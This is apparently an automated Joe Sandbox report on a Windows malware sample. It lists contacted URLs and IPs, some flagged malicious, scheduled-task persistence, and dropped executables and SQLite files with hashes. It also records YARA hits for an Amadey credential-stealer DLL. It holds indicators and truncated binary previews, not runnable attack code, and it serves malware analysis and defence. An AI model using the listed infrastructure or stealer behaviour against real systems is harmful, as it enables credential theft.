http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=https://studio.youtube.com/youtubei/v1/a	RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13Response	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
43.231.112.109	hoteldostyk.com	Mongolia	63962	ITOOLS-ASiToolsJSCMN	true
65.21.213.208	unknown	United States	199592	CP-ASDE	false
216.58.215.238	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
195.96.151.51	cdn-102.anonfiles.com	unknown	8437	UTA-ASAT	true
140.82.121.4	github.com	United States	36459	GITHUBUS	false
185.106.92.111	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
108.167.141.212	srshf.com	United States	46606	UNIFIEDLAYER-AS-1US	true
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
116.202.5.101	unknown	Germany	24940	HETZNER-ASDE	false
3.5.21.195	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
148.251.234.93	iplogger.com	Germany	24940	HETZNER-ASDE	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	true
193.56.146.174	unknown	unknown	10753	LVLT-10753US	true
77.232.37.228	o36fafs3sn6xou.com	Russian Federation	28968	EUT-ASEUTIPNetworkRU	true
46.252.148.24	1ecosolution.it	Italy	60087	ASSUPERNOVAIT	true
45.154.253.151	anonfiles.com	Sweden	41634	SVEASE	true
193.56.146.168	unknown	unknown	10753	LVLT-10753US	true

Private

IP
192.168.2.3

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	749948
Start date and time:	2022-11-19 16:56:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 47s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	q4Z52wRd28.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@67/24@47/20
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.8% (good quality ratio 21%) Quality average: 34.6% Quality standard deviation: 30%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:58:02	Task Scheduler	Run new task: Firefox Default Browser Agent 6797C828451BEB6A path: C:\Users\user\AppData\Roaming\cttgcew
16:58:34	API Interceptor	849x Sleep call for process: rovwer.exe modified
16:58:35	Task Scheduler	Run new task: rovwer.exe path: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
16:58:48	API Interceptor	1077x Sleep call for process: explorer.exe modified
17:01:07	API Interceptor	3x Sleep call for process: F771.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\07477506288530029273670714

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\34118869306534953191217255

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\39680000161077974836781923

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\42917201296364153697665931

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7217007190866341
Encrypted:	false
SSDEEP:	384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
MD5:	FEF7F4B210100663DC7731400BAC534E
SHA1:	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
SHA-256:	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
SHA-512:	6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\45253720055769576867799735

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\65329382289861898742549564

Download File

Process:	C:\Users\user\AppData\Local\Temp\EB2B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7217007190866341
Encrypted:	false
SSDEEP:	384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
MD5:	FEF7F4B210100663DC7731400BAC534E
SHA1:	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
SHA-256:	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
SHA-512:	6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.5122035629449355
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
MD5:	507E9DC7B9C42F535B6DF96D79179835
SHA1:	ACF41FB549750023115F060071AA5CA8C33F249E
SHA-256:	3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
SHA-512:	70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Metadefender, Detection: 71%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\853321935212

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	83622
Entropy (8bit):	7.896233698964525
Encrypted:	false
SSDEEP:	1536:CQK+hI2P4mo0keu1RQ99zoHIgtO7czx4997CGPdOjT06SejjnhiVxp669P:JAmo081RQfzbgtOm4HrlO/jTjhKhZ
MD5:	B06A833A71D8716720C60C23DF02F550
SHA1:	2FD374453D9C4CB2846545FDDC72DA9E180D59AA
SHA-256:	A0B3FEDED6D6FA5822265F0F232E491533488D14AB18ABE177E34C2CC0F8828A
SHA-512:	756F671F4FC63F0D36E263C6AC591F06D0CA3F6E3A58A1E184E25F53214495F147FA36AE7E4B6287F7940148EF53A657C7BF19B2831C5F25916FEAA90C70A875
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\A852.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	385536
Entropy (8bit):	6.960915435029956
Encrypted:	false
SSDEEP:	6144:jUN5jZipJMHjeMigfbk532zhVVPE+O1voXc:U5tipJMDDiKkpCDO
MD5:	0E455D9C65E7D53A67C227DCD8D70FB8
SHA1:	F776A9F8165D6E41FB249223B5568D9C3FFA23B4
SHA-256:	29BF9DAF2F5FFC7DF253FA7FDD78E4A02669DF89FD7F0517A599F6C70EA1F121
SHA-512:	D441908A743FECD572518624238C138C7C7F4A88779963D8134AC7B5E9CB89C52259A2F601BB8891A565DEF48B07771AB4EA623C81B54306F3290FFC364C5BCA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.....................D......P.......@....@...........................F.....aZ......................................t/..(....pC.xE....................E..................................... -..@............................................text...R(......................... ..`.data....B..@.....................@....rsrc...xE...pC..F...X..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A852.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	385536
Entropy (8bit):	6.960915435029956
Encrypted:	false
SSDEEP:	6144:jUN5jZipJMHjeMigfbk532zhVVPE+O1voXc:U5tipJMDDiKkpCDO
MD5:	0E455D9C65E7D53A67C227DCD8D70FB8
SHA1:	F776A9F8165D6E41FB249223B5568D9C3FFA23B4
SHA-256:	29BF9DAF2F5FFC7DF253FA7FDD78E4A02669DF89FD7F0517A599F6C70EA1F121
SHA-512:	D441908A743FECD572518624238C138C7C7F4A88779963D8134AC7B5E9CB89C52259A2F601BB8891A565DEF48B07771AB4EA623C81B54306F3290FFC364C5BCA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.....................D......P.......@....@...........................F.....aZ......................................t/..(....pC.xE....................E..................................... -..@............................................text...R(......................... ..`.data....B..@.....................@....rsrc...xE...pC..F...X..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B4A7.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1235912
Entropy (8bit):	7.847488370221355
Encrypted:	false
SSDEEP:	24576:tpoG1/LlgEyH9QhH0slclslX6ptmEh4NqYJUo02O7RVUCshnSVjGMY0tZ8bMyqZs:tpocLlac0s5Ih4Ny/Ybb
MD5:	F96144B1D5B53D93CAADDDADE38DB5E9
SHA1:	1587E66F9A4D83060EE597F983A7323A556BC1C0
SHA-256:	63018F38311387AA7F511F090FD154EA6EC3799C2F4762890082793912C68146
SHA-512:	824A86438150DF143C7475605600B4A03DBFA819806F193BE248650A3A70E97BDCD3D20CAC9B8B00693D464B5CBD168E1F0C78BEAA00D167B8A877CFBCE3C34C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..{..M{..M{..M..fMg..M..SMi..M..gM...Mr.^Mr..M{..M&..M..bMy..M..WMz..M{.ZM}..M..PMz..MRich{..M................PE..L...O.wc.................X..........mk.......p....@.......................... ..................................................d........3...........................................................................p..\............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...,5..........................@....rsrc....3.......4..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CF35.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3188224
Entropy (8bit):	7.964888519163398
Encrypted:	false
SSDEEP:	98304:9R5aeXkEIsmuDvFmvNtLmVLF5HLiBrvpPFI:9Dv5lJz4v3LMLiBrh2
MD5:	44A7E13ECC55CE9797C5121B230D9927
SHA1:	B99F1D86E6D9C7E0D694CA605ABD205663278487
SHA-256:	9E0425E14520485FA7E86057D07D26E8064F99A7AD09E35211EDD4A428EE57AE
SHA-512:	74DF06B20D23483F854B5A88E5CCDFE534497630A105614E6CD87F3238398E0FB03218CB864FD6F7798B69E083C1098225010AECD959FBEC28D63C0626711A9F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 23%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!...O...O...O..wL...O..wK...O..wJ.e.O..wN...O...N..O.fK...O.fL...O.fJ..O.fJ...O.fM...O.Rich..O.................PE..d....0xc..........".... .6..........4..........@..............................1...........`..................................................^..(.............0.$$............0.(...P)...............................(..@............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....6-..p... -..T..............@....pdata..$$....0..&...t0.............@..@_RDATA..\.....0.......0.............@..@.reloc..(.....0.......0.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E35A.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.812640405950158
Encrypted:	false
SSDEEP:	6144:CV8MTz4fnz5/zNOCVmcUh+3oQ9gOU+fzYBb6:bMYfz5smmM9gT6
MD5:	19A79DADDFAAC09499E79ADE27E756F8
SHA1:	6BFD114AF2D1A68C4724961C6E761373EFE66C52
SHA-256:	3F2EA3CA90B2DF0D2A93DF0E4328F58077A5BDBB97B2DFFE81B589C057F93216
SHA-512:	AEA9D6CF93EB6ADA5D895C70DA8CBF4CA56BEB1125FC33961E112DCBAEA122F82DD4CBC9FE241DDCC5F5EBC6A71F83B03BEAF645F3A6E2724ACB03E7D61007A3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.,.?iB.?iB.?iB.!;..iB.!;.,iB.!;..AiB...9.<iB.?iC.FiB.!;.>iB.!;.>iB.!;.>iB.Rich?iB.........PE..L....^Na................. ....D......H.......0....@..........................pE......!......................................t%..(.....B..A................... E..................................... -..@............................................text...V........ .................. ..`.data.....A..0.......$..............@....rsrc....A....B..B..................@..@.reloc...A... E..B..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EB2B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341006
Entropy (8bit):	7.632238569480827
Encrypted:	false
SSDEEP:	6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
MD5:	F46063253FF38E6B2452BF4410C5FEC0
SHA1:	C2444E21CC72BFC1CD74197E327323EB2E3E3815
SHA-256:	D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
SHA-512:	BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F771.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	459264
Entropy (8bit):	7.1855716974211346
Encrypted:	false
SSDEEP:	6144:2nj+jLGbR5prANXqK4ULWttLmBr3C7JVMUjpPnFwCLLObfwB:A+He6NXpWRmBrgfxqC3O
MD5:	DF920AEBFABB8C4CCCEB4DCEAD922ABD
SHA1:	BE09CF240FBB15B7EAFC3D875C17B0EE30E94AA1
SHA-256:	46DC1985999FC34875C1110E2E9A177A5A637B7668657525F6148AAC2CD23996
SHA-512:	075AB9409F4DB41ADBA43652F3CF00DDA51799D9146AD7502B4B04524C68EBC2A0108307E979B49D86C45051F9D31684514F96490B5D782107C279BFF90C8CA6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L...y..a.....................E.....JP.......@....@..........................0G.............................................$/..(.....D..F....................F......................................,..@............................................text....(......................... ..`.data...hGC..@...H..................@....rsrc....F....D..H...v..............@..@.reloc..FC....F..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\prefix3648256442

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.5122035629449355
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
MD5:	507E9DC7B9C42F535B6DF96D79179835
SHA1:	ACF41FB549750023115F060071AA5CA8C33F249E
SHA-256:	3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
SHA-512:	70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Metadefender, Detection: 71%, Browse
